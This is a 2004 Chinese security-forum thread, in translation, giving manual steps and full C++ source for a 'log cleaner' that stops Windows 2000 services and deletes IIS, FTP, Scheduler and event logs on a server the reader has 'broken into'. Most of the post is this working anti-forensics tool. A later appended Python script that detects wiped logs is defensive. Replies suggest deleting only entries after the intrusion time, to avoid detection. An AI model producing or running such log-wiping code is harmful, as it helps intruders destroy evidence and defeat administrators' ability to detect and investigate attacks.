Author: abctm [abctm]
How a Windows 2000 log cleaner is made

I'm sure everyone has used Xiao Rong's CleanIISLog; it is a decent log cleaning tool. Unfortunately it can only clear IIS logs. What about the log files produced by FTP and the Scheduler? Usually we can only clear those by hand.

Windows 2000 log files usually include the application log, security log, system log, DNS server log, FTP log, WWW log and so on; which ones exist depends on the services the server runs.

The general steps are as follows:

1. Clear the IIS logs.

Don't underestimate IIS logging: it records your entire intrusion in detail, such as the commands you typed in IE during a Unicode attack and the traces left by scanning port 80. Neglect it and the admin may get onto you, and maybe even....... heh.

So let's clear them manually. The default log location is %systemroot%\system32\logfiles\w3svc1\, one log per day by default. Change into that directory and run del *.*. You probably think you're safe now, so do a dir. Huh? Today's log is still there. Don't panic: it's because the w3svc service is still running. So how do we clear that log file?

Method one: if you can log in over 3389, open it in Notepad, Ctrl+A, then Delete.

Method two: the net command.

```
C:\>net stop w3svc
World Wide Web Publishing Service 服务正在停止.
World Wide Web Publishing Service 服务已成功停止。
```

(This may take a very long time, and may not succeed.)

Now that w3svc is stopped we can empty its logs: del *.*. And don't forget to start the w3svc service again:

```
C:\>net start w3svc
```

2. Clear the FTP logs.

FTP log default location: %systemroot%\system32\logfiles\msftpsvc1\, one log per day by default. Same clearing method as above.

3. Clear the Scheduler log.

Scheduler service log default location: %systemroot%\schedlgu.txt. Same method as above.

4. Application log, security log, system log, DNS log.

Default location: %systemroot%\system32\config. Same method as above.

Note that the three directories above may not be where stated, because the administrator changed them; their locations can be read from the registry. The application, security, system and DNS server log files are recorded in the registry under: HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Eventlog. The Scheduler service log is under: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SchedulingAgent.

5. (This part I borrowed from someone else's article; actually I just copied it.)

OK! Congratulations, the simple logs have all been deleted. Next come the hard ones, the security log and the system log. The service guarding them is Event Log; try stopping it!

```
D:\SERVER\system32\LogFiles\W3SVC1>net stop eventlog
这项服务无法接受请求的 "暂停" 或 "停止" 操作。
```

KAO, I give up. No way around it: it's a critical service. Without a third-party tool there is simply no way to delete the security and system logs from the command line! So we have to use the method that is simple but so slow the machine seems to hang: open Event Viewer under Control Panel > Administrative Tools (98 doesn't have it; now you know the benefit of Win2k). The Action menu has an item named "Connect to another computer"; click it as shown in the figure below. Enter the remote computer's IP, light a cigarette, wait tens of minutes enduring what feels like a hang, and the next figure opens. Select the remote computer's security log and right-click to open its properties. Click the "Clear Log" button in the properties. OK! Security log cleared! Endure the same pain to clear the system log!

6. You have now cleared most of the important logs. What remains is to catch anything that may have slipped through. Do this: del the following files:

\winnt\*.log
under system32:
\logfiles\*.*
\dtclog\*.*
\config\*.evt
\*.log
\*.txt

So far I've shown you how to clear most of the logs I know of; go put it to use. Actually the main purpose of this article is not to teach you how to clear logs but to teach you to write a log-clearing tool. Treat everything I said above as hot air.

Now to the main topic. You've seen the process for clearing all the logs; tedious, isn't it? Doing it by hand takes a lot of time, and sometimes you still can't clear everything. A friend who programs will think: I can code, what am I afraid of? So let's get to work.

You now know that to clear some logs you first have to stop some services. So first I'll show you how to write a small DOS tool that lists the machine's services; for the implementation see my earlier article 《如果做一个dos下的服务程序查看器》 (How to make a DOS service viewer). The tool is serName.exe; run it:

```
serName.exe -t 1 -t 1
```

Heh, all the services running on the machine are listed, right? Remember the names of the services you want to stop; you'll need them below.

The second programming step is to stop the w3svc, schedule, ftp and other services. My code is below; read it slowly alongside MSDN. (It's not hard; if there's something you don't understand, don't come asking me.)

```cpp
void StopServices(LPCTSTR lpServiceName)
{
    SC_HANDLE scman = ::OpenSCManager(NULL, NULL, SC_MANAGER_ENUMERATE_SERVICE);
    if (scman)
    {
        SC_HANDLE sh = ::OpenService(scman, lpServiceName, SERVICE_STOP);
        if (sh)
        {
            BOOL bControl;
            SERVICE_STATUS ServiceStatus;
            bControl = ControlService(sh, SERVICE_CONTROL_STOP, &ServiceStatus);
            DWORD dwControl;
            if (bControl)
            {
                printf("success to stop the service \"%s\"\n", lpServiceName);
            }
            else
            {
                dwControl = ::GetLastError();
                switch (dwControl) {
                case ERROR_ACCESS_DENIED: printf("The specified handle was not opened with the necessary access.\n"); break;
                case ERROR_SERVICE_NOT_ACTIVE: printf("The service has not been started.\n"); break;
                case ERROR_DEPENDENT_SERVICES_RUNNING: printf("The service cannot be stopped because other running services are dependent on it.\n"); break;
                case ERROR_INVALID_SERVICE_CONTROL: printf("The requested control code is not valid, or it is unacceptable to the service.\n"); break;
                case ERROR_SERVICE_CANNOT_ACCEPT_CTRL: printf("The requested control code cannot be sent to the service because the state of the service is SERVICE_STOPPED, SERVICE_START_PENDING, or SERVICE_STOP_PENDING.\n"); break;
                case ERROR_SERVICE_REQUEST_TIMEOUT: printf("The service did not respond to the start request in a timely fashion.\n"); break;
                }
            }
            ::CloseServiceHandle(sh);
        }
        ::CloseServiceHandle(scman);
    }
    return;
}
```

With the function in place, write a main function to try it:

```cpp
int main()
{
    StopServices("W3SVC");
    return 0;
}
```

OK, it worked. If it didn't, check the error message printed. Now we have a function that can stop a service; we also need one that can start a service. If you understood the above, the code below is just a few small changes to it.

```cpp
void StartServices(LPCTSTR lpServiceName)
{
    SC_HANDLE scman = ::OpenSCManager(NULL, NULL, SC_MANAGER_ENUMERATE_SERVICE);
    if (scman)
    {
        SC_HANDLE sh = ::OpenService(scman, lpServiceName, SERVICE_START);
        if (sh)
        {
            BOOL bControl;
            bControl = StartService(sh, 1, &lpServiceName);
            DWORD dwControl;
            if (bControl)
            {
                printf("success to start the service \"%s\"\n", lpServiceName);
            }
            else
            {
                dwControl = ::GetLastError();
                switch (dwControl) {
                case ERROR_ACCESS_DENIED: printf("The specified handle was not opened with SERVICE_START access.\n"); break;
                case ERROR_INVALID_HANDLE: printf("The specified handle is invalid.\n"); break;
                case ERROR_PATH_NOT_FOUND: printf("The service binary file could not be found.\n"); break;
                case ERROR_SERVICE_ALREADY_RUNNING: printf("An instance of the service is already running.\n"); break;
                case ERROR_SERVICE_DATABASE_LOCKED: printf("The database is locked.\n"); break;
                case ERROR_SERVICE_DEPENDENCY_DELETED: printf("The service depends on a service that does not exist or has been marked for deletion.\n"); break;
                case ERROR_SERVICE_DEPENDENCY_FAIL: printf("The service depends on another service that has failed to start.\n"); break;
                case ERROR_SERVICE_DISABLED: printf("The service has been disabled.\n"); break;
                case ERROR_SERVICE_LOGON_FAILED: printf("The service could not be logged on.\n"); break;
                case ERROR_SERVICE_MARKED_FOR_DELETE: printf("The service has been marked for deletion.\n"); break;
                case ERROR_SERVICE_NO_THREAD: printf("A thread could not be created for the service.\n"); break;
                case ERROR_SERVICE_REQUEST_TIMEOUT: printf("The service did not respond to the start request in a timely fashion.\n"); break;
                }
            }
            ::CloseServiceHandle(sh);
        }
        ::CloseServiceHandle(scman);
    }
    return;
}
```

Heh, just small changes. Now you have these two weapons; next is to use what you learned in the first part to delete the files. I don't think I need to teach you that; you've surely figured out how.

Now for a third weapon. Our program could do without it, but a nice program needs it: a function that determines a service's state. My code follows.

```cpp
DWORD GetServicesState(LPCTSTR lpServiceName)
{
    DWORD dwState = 0;   // 0 means "unknown": the query failed or the handles could not be opened
    SC_HANDLE scman = ::OpenSCManager(NULL, NULL, SC_MANAGER_ENUMERATE_SERVICE);
    if (scman)
    {
        SC_HANDLE sh = ::OpenService(scman, lpServiceName, SERVICE_QUERY_STATUS);
        if (sh)
        {
            BOOL bQuery;
            SERVICE_STATUS ServiceStatus;
            bQuery = QueryServiceStatus(sh, &ServiceStatus);
            if (!bQuery)
            {
                DWORD dwControl;
                dwControl = ::GetLastError();
                switch (dwControl) {
                case ERROR_ACCESS_DENIED: printf("The specified handle was not opened with SERVICE_QUERY_STATUS access.\n"); break;
                case ERROR_INVALID_HANDLE: printf("The specified handle is invalid.\n"); break;
                }
                dwState = 0;
            }
            else
            {
                dwState = ServiceStatus.dwCurrentState;
            }
            ::CloseServiceHandle(sh);
        }
        ::CloseServiceHandle(scman);
    }
    return dwState;
}
```

Now we have everything; let's finish the code. The rest is below. I hope you adjust the source to the specifics of the system you broke into before running it.

```cpp
//==========================================================//
//  绿兵日志Cleaner1.0                                         //
//  Compiled by http://www.vertarmy.com 绿色兵团               //
//  http://vcghost.yeah.net 编の魂(tryibest)                  //
//  tjhacker@163.com                                          //
//==========================================================//
#include <windows.h>
#include <stdio.h>

void  StopServices(LPCTSTR lpServiceName);
void  StartServices(LPCTSTR lpServiceName);
DWORD GetServicesState(LPCTSTR lpServiceName);
void  DelFiles(LPCTSTR lpFileName, LPCTSTR lpDirectory);
void  Del3WFile();
void  DelFtpFile();
void  DelSheduleFile();
void  DelOtherFile();
void  ShowTitle();

int main(int argc, char *argv[])
{
    ShowTitle();
    DelOtherFile();
    Del3WFile();
    DelFtpFile();
    DelSheduleFile();
    ShowTitle();
    return 0;
}

void StopServices(LPCTSTR lpServiceName)
{
    SC_HANDLE scman = ::OpenSCManager(NULL, NULL, SC_MANAGER_ENUMERATE_SERVICE);
    if (scman)
    {
        SC_HANDLE sh = ::OpenService(scman, lpServiceName, SERVICE_STOP);
        if (sh)
        {
            BOOL bControl;
            SERVICE_STATUS ServiceStatus;
            bControl = ControlService(sh, SERVICE_CONTROL_STOP, &ServiceStatus);
            DWORD dwControl;
            if (bControl)
            {
                printf("success to stop the service \"%s\"\n", lpServiceName);
            }
            else
            {
                dwControl = ::GetLastError();
                switch (dwControl) {
                case ERROR_ACCESS_DENIED: printf("The specified handle was not opened with the necessary access.\n"); break;
                case ERROR_SERVICE_NOT_ACTIVE: printf("The service has not been started.\n"); break;
                case ERROR_DEPENDENT_SERVICES_RUNNING: printf("The service cannot be stopped because other running services are dependent on it.\n"); break;
                case ERROR_INVALID_SERVICE_CONTROL: printf("The requested control code is not valid, or it is unacceptable to the service.\n"); break;
                case ERROR_SERVICE_CANNOT_ACCEPT_CTRL: printf("The requested control code cannot be sent to the service because the state of the service is SERVICE_STOPPED, SERVICE_START_PENDING, or SERVICE_STOP_PENDING.\n"); break;
                case ERROR_SERVICE_REQUEST_TIMEOUT: printf("The service did not respond to the start request in a timely fashion.\n"); break;
                }
            }
            ::CloseServiceHandle(sh);
        }
        ::CloseServiceHandle(scman);
    }
    return;
}

void StartServices(LPCTSTR lpServiceName)
{
    SC_HANDLE scman = ::OpenSCManager(NULL, NULL, SC_MANAGER_ENUMERATE_SERVICE);
    if (scman)
    {
        SC_HANDLE sh = ::OpenService(scman, lpServiceName, SERVICE_START);
        if (sh)
        {
            BOOL bControl;
            bControl = StartService(sh, 1, &lpServiceName);
            DWORD dwControl;
            if (bControl)
            {
                printf("success to start the service \"%s\"\n", lpServiceName);
            }
            else
            {
                dwControl = ::GetLastError();
                switch (dwControl) {
                case ERROR_ACCESS_DENIED: printf("The specified handle was not opened with SERVICE_START access.\n"); break;
                case ERROR_INVALID_HANDLE: printf("The specified handle is invalid.\n"); break;
                case ERROR_PATH_NOT_FOUND: printf("The service binary file could not be found.\n"); break;
                case ERROR_SERVICE_ALREADY_RUNNING: printf("An instance of the service is already running.\n"); break;
                case ERROR_SERVICE_DATABASE_LOCKED: printf("The database is locked.\n"); break;
                case ERROR_SERVICE_DEPENDENCY_DELETED: printf("The service depends on a service that does not exist or has been marked for deletion.\n"); break;
                case ERROR_SERVICE_DEPENDENCY_FAIL: printf("The service depends on another service that has failed to start.\n"); break;
                case ERROR_SERVICE_DISABLED: printf("The service has been disabled.\n"); break;
                case ERROR_SERVICE_LOGON_FAILED: printf("The service could not be logged on.\n"); break;
                case ERROR_SERVICE_MARKED_FOR_DELETE: printf("The service has been marked for deletion.\n"); break;
                case ERROR_SERVICE_NO_THREAD: printf("A thread could not be created for the service.\n"); break;
                case ERROR_SERVICE_REQUEST_TIMEOUT: printf("The service did not respond to the start request in a timely fashion.\n"); break;
                }
            }
            ::CloseServiceHandle(sh);
        }
        ::CloseServiceHandle(scman);
    }
    return;
}

DWORD GetServicesState(LPCTSTR lpServiceName)
{
    DWORD dwState = 0;   // 0 means "unknown": the query failed or the handles could not be opened
    SC_HANDLE scman = ::OpenSCManager(NULL, NULL, SC_MANAGER_ENUMERATE_SERVICE);
    if (scman)
    {
        SC_HANDLE sh = ::OpenService(scman, lpServiceName, SERVICE_QUERY_STATUS);
        if (sh)
        {
            BOOL bQuery;
            SERVICE_STATUS ServiceStatus;
            bQuery = QueryServiceStatus(sh, &ServiceStatus);
            if (!bQuery)
            {
                DWORD dwControl;
                dwControl = ::GetLastError();
                switch (dwControl) {
                case ERROR_ACCESS_DENIED: printf("The specified handle was not opened with SERVICE_QUERY_STATUS access.\n"); break;
                case ERROR_INVALID_HANDLE: printf("The specified handle is invalid.\n"); break;
                }
                dwState = 0;
            }
            else
            {
                dwState = ServiceStatus.dwCurrentState;
            }
            ::CloseServiceHandle(sh);
        }
        ::CloseServiceHandle(scman);
    }
    return dwState;
}

// Delete every file matching the pattern lpFileName; lpDirectory is the
// directory part (with trailing backslash) used to build each full path.
void DelFiles(LPCTSTR lpFileName, LPCTSTR lpDirectory)
{
    TCHAR tcFileName[1024];
    HANDLE hFile;
    WIN32_FIND_DATA FindFileData;
    hFile = FindFirstFile(lpFileName, &FindFileData);
    if (hFile != INVALID_HANDLE_VALUE)
    {
        while (1)
        {
            lstrcpy(tcFileName, lpDirectory);
            lstrcat(tcFileName, FindFileData.cFileName);
            BOOL dDel = DeleteFile(tcFileName);
            if (dDel)
            {
                printf("delete file \"%s\" success\n", tcFileName);
            }
            else
            {
                printf("delete file \"%s\" fail\n", tcFileName);
            }
            if (!FindNextFile(hFile, &FindFileData))
            {
                break;
            }
        }
        FindClose(hFile);   // only close a search handle that was actually opened
    }
}

void Del3WFile()
{
    TCHAR tcSystemDirectory[1024];
    ::GetSystemDirectory(tcSystemDirectory, 1024);
    TCHAR tc3WDirectory[1024];
    TCHAR tc3WFile[1024];
    lstrcpy(tc3WDirectory, tcSystemDirectory);
    lstrcpy(tc3WFile, tcSystemDirectory);
    lstrcat(tc3WFile, "\\logfiles\\w3svc1\\*.log");
    lstrcat(tc3WDirectory, "\\logfiles\\w3svc1\\");
    DWORD dwState;
    dwState = GetServicesState("w3svc");
    if (dwState == SERVICE_RUNNING)
    {
        StopServices("w3svc");
        ::Sleep(1000);
        DelFiles(tc3WFile, tc3WDirectory);
        ::Sleep(1000);   // should consider using a thread
        StartServices("w3svc");
    }
    else
    {
        DelFiles(tc3WFile, tc3WDirectory);
    }
}

void DelFtpFile()
{
    TCHAR tcSystemDirectory[1024];
    ::GetSystemDirectory(tcSystemDirectory, 1024);
    TCHAR tcFtpDirectory[1024];
    TCHAR tcFtpFile[1024];
    lstrcpy(tcFtpDirectory, tcSystemDirectory);
    lstrcpy(tcFtpFile, tcSystemDirectory);
    lstrcat(tcFtpFile, "\\logfiles\\msftpsvc1\\*.log");
    lstrcat(tcFtpDirectory, "\\logfiles\\msftpsvc1\\");
    DWORD dwState;
    dwState = GetServicesState("msftpsvc");
    if (dwState == SERVICE_RUNNING)
    {
        StopServices("msftpsvc");
        ::Sleep(1000);
        DelFiles(tcFtpFile, tcFtpDirectory);
        ::Sleep(1000);   // should consider using a thread
        StartServices("msftpsvc");
    }
    else
    {
        DelFiles(tcFtpFile, tcFtpDirectory);
    }
}

void DelSheduleFile()
{
    TCHAR tcSystemDirectory[1024];
    ::GetSystemDirectory(tcSystemDirectory, 1024);
    TCHAR tcScheduleFile[1024];
    lstrcpy(tcScheduleFile, tcSystemDirectory);
    // strip the last path component (system32) to get %systemroot%
    int iLength = lstrlen(tcScheduleFile);
    while (1)
    {
        iLength--;
        if (tcScheduleFile[iLength] == '\\') break;
    }
    tcScheduleFile[iLength] = '\0';
    lstrcat(tcScheduleFile, "\\SchedLgU.txt");
    DWORD dwState;
    dwState = GetServicesState("schedule");
    if (dwState == SERVICE_RUNNING)
    {
        StopServices("schedule");
        ::Sleep(1000);
        BOOL dDel = DeleteFile(tcScheduleFile);
        if (dDel)
        {
            printf("delete file \"%s\" success\n", tcScheduleFile);
        }
        else
        {
            printf("delete file \"%s\" fail\n", tcScheduleFile);
        }
        // DelFiles(tcScheduleFile,tcScheduleDirectory);
        ::Sleep(1000);   // should consider using a thread
        StartServices("schedule");
    }
    else
    {
        BOOL dDel = DeleteFile(tcScheduleFile);
        if (dDel)
        {
            printf("delete file \"%s\" success\n", tcScheduleFile);
        }
        else
        {
            printf("delete file \"%s\" fail\n", tcScheduleFile);
        }
        // DelFiles(tcScheduleFile,tcScheduleDirectory);
    }
}

void DelOtherFile()
{
    TCHAR tcSystemDirectory[1024];
    ::GetSystemDirectory(tcSystemDirectory, 1024);
    TCHAR tcOtherFile[1024];
    TCHAR tcOtherDirectory[1024];

    // delete all files under logfiles
    lstrcpy(tcOtherFile, tcSystemDirectory);
    lstrcpy(tcOtherDirectory, tcSystemDirectory);
    lstrcat(tcOtherFile, "\\logfiles\\*.*");
    lstrcat(tcOtherDirectory, "\\logfiles\\");
    DelFiles(tcOtherFile, tcOtherDirectory);

    // delete all files under dtclog
    lstrcpy(tcOtherFile, tcSystemDirectory);
    lstrcpy(tcOtherDirectory, tcSystemDirectory);
    lstrcat(tcOtherFile, "\\dtclog\\*.*");
    lstrcat(tcOtherDirectory, "\\dtclog\\");
    DelFiles(tcOtherFile, tcOtherDirectory);

    // delete all files under config
    lstrcpy(tcOtherFile, tcSystemDirectory);
    lstrcpy(tcOtherDirectory, tcSystemDirectory);
    lstrcat(tcOtherFile, "\\config\\*.*");
    lstrcat(tcOtherDirectory, "\\config\\");
    DelFiles(tcOtherFile, tcOtherDirectory);

    // delete all .log files under system32
    lstrcpy(tcOtherFile, tcSystemDirectory);
    lstrcpy(tcOtherDirectory, tcSystemDirectory);
    lstrcat(tcOtherFile, "\\*.log");
    lstrcat(tcOtherDirectory, "\\");
    DelFiles(tcOtherFile, tcOtherDirectory);

    // delete all .txt files under system32
    lstrcpy(tcOtherFile, tcSystemDirectory);
    lstrcpy(tcOtherDirectory, tcSystemDirectory);
    lstrcat(tcOtherFile, "\\*.txt");
    lstrcat(tcOtherDirectory, "\\");
    DelFiles(tcOtherFile, tcOtherDirectory);

    // get the \winnt\ directory path
    TCHAR tcWinDirectory[1024];
    lstrcpy(tcWinDirectory, tcSystemDirectory);
    int iLength = lstrlen(tcWinDirectory);
    while (1)
    {
        iLength--;
        if (tcWinDirectory[iLength] == '\\') break;
    }
    tcWinDirectory[iLength] = '\0';

    // delete \winnt\*.log
    lstrcpy(tcOtherFile, tcWinDirectory);
    lstrcpy(tcOtherDirectory, tcWinDirectory);
    lstrcat(tcOtherFile, "\\*.log");
    lstrcat(tcOtherDirectory, "\\");
    DelFiles(tcOtherFile, tcOtherDirectory);

    // delete \winnt\*.txt
    lstrcpy(tcOtherFile, tcWinDirectory);
    lstrcpy(tcOtherDirectory, tcWinDirectory);
    lstrcat(tcOtherFile, "\\*.txt");
    lstrcat(tcOtherDirectory, "\\");
    DelFiles(tcOtherFile, tcOtherDirectory);
}

void ShowTitle()
{
    printf("===========================================================\n");
    printf("$ 绿兵日志Cleaner1.0 $\n");
    printf("$ Compiled by http://www.vertarmy.com 绿色兵团 $\n");
    printf("$ http://vcghost.yeah.net 编の魂(tryibest) $\n");
    printf("$ tjhacker@163.com $\n");
    printf("===========================================================\n");
}
```
Original poster, posted: 04-02-11 06:39
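A defender-side counterpart to the procedure above, added here and not part of the original post or the tool it describes. The stop-w3svc / del *.* / start-w3svc sequence leaves the daily exYYMMDD.log series with missing days and a surviving file whose first #Date header sits mid-day instead of just after midnight, and hand-editing a log leaves timestamps out of order; the checks below look for exactly those traces. The sample log contents and the 15-minute header threshold are constructed assumptions, not values from the page.

```python
"""Integrity checks for IIS 5 daily W3C logs (exYYMMDD.log) after a suspected wipe.
Heuristics: missing days in the daily sequence, a first #Date header far past
midnight (earlier part of the day removed), timestamps running backwards (edited)."""
from datetime import datetime, timedelta

NAME_FMT = "ex%y%m%d.log"        # IIS 5 daily file naming under logfiles\W3SVC1
STAMP_FMT = "%Y-%m-%d %H:%M:%S"  # W3C "date time" fields

# Constructed sample: 2004-02-10 is absent, 2004-02-11 was wiped and the service
# restarted at 06:39, then an entry was inserted out of order.
SAMPLE_LOGS = {
    "ex040209.log": [
        "#Date: 2004-02-09 00:00:03",
        "#Fields: date time c-ip cs-method cs-uri-stem sc-status",
        "2004-02-09 00:00:03 10.0.0.5 GET /default.htm 200",
        "2004-02-09 23:58:40 10.0.0.7 GET /index.asp 200",
    ],
    "ex040211.log": [
        "#Date: 2004-02-11 06:39:12",
        "#Fields: date time c-ip cs-method cs-uri-stem sc-status",
        "2004-02-11 06:39:12 10.0.0.9 GET /default.htm 200",
        "2004-02-11 03:10:00 10.0.0.9 GET /index.asp 200",
    ],
}

def missing_days(names):
    """Return the exYYMMDD.log names absent between the first and last day present."""
    days = sorted(datetime.strptime(n, NAME_FMT).date() for n in names)
    present, day, missing = set(days), days[0], []
    while day <= days[-1]:
        if day not in present:
            missing.append(day.strftime(NAME_FMT))
        day += timedelta(days=1)
    return missing

def audit_file(lines, max_first_header_minutes=15):
    """Return findings for one daily log: late first header, backwards timestamps."""
    findings, last = [], None
    for line in lines:
        if line.startswith("#Date: "):
            stamp = datetime.strptime(line[7:], STAMP_FMT)
            # A daily file normally opens just after midnight; a first header hours
            # later means the entries before it are gone (threshold is an assumption).
            if last is None and stamp.hour * 60 + stamp.minute > max_first_header_minutes:
                findings.append(f"first header at {stamp.time()}, earlier entries missing")
        elif not line.startswith("#"):
            stamp = datetime.strptime(" ".join(line.split()[:2]), STAMP_FMT)
            if last is not None and stamp < last:
                findings.append(f"timestamp {stamp} earlier than preceding {last}")
            last = stamp
    return findings
```

A quiet server can legitimately open its daily file late, so the header check is a lead to corroborate against the System event log's service stop/start records, not proof on its own.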
Reply: 286 [unique]

Searched everywhere in vain, then found it without any effort at all.

Floor B1, posted: 04-02-11 08:57
Reply: NetDemon [netdemon]

No good. Run this thing and everything is gone; even a fool can tell someone has been in. A tool like this should take a time value and only remove entries after that time. Log lines generally each carry a timestamp, so it's quite easy to handle; in Perl it could be done in under 20 lines.

Floor B2, posted: 04-02-11 14:27
Reply: seny11 [seny11]

双星, what programming languages have you learned... so impressive... Could you write an operating system? What if I can't learn assembly? What do you need to learn for network programming besides Java, ASP and PHP? What do you need to learn to write your own virus?!

Floor B3, posted: 04-02-11 15:54
Reply: sniper167 [sniper167]

Impressive. I can't really follow it.

Floor B4, posted: 04-02-11 19:00
Reply: yingzike [yingzike]

Good stuff, bookmarking it first.

Floor B5, posted: 04-02-11 19:49
Reply: lqfrla [lqfrla]

双星 only reposted it.

Floor B6, posted: 04-02-12 11:39
Reply: neaes [near]

Heh. I can't understand it; what language is it?

Floor B7, posted: 04-02-12 13:29
Reply: myjian [myjian]

C, I guess??

Floor B8, posted: 04-02-12 17:39
Reply: jiangweng [jiangweng]

Looks like C... I only understand a little of it... Sigh, I'm too much of a newbie.

Floor B9, posted: 04-02-14 21:12
Reply: ziaichen [ziaichen]

Great post! Bumping it!

Floor B10, posted: 04-02-15 22:12
Copyright 20CN Network Security Group.
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
Forum software written by: NetDemon
粤ICP备05087286号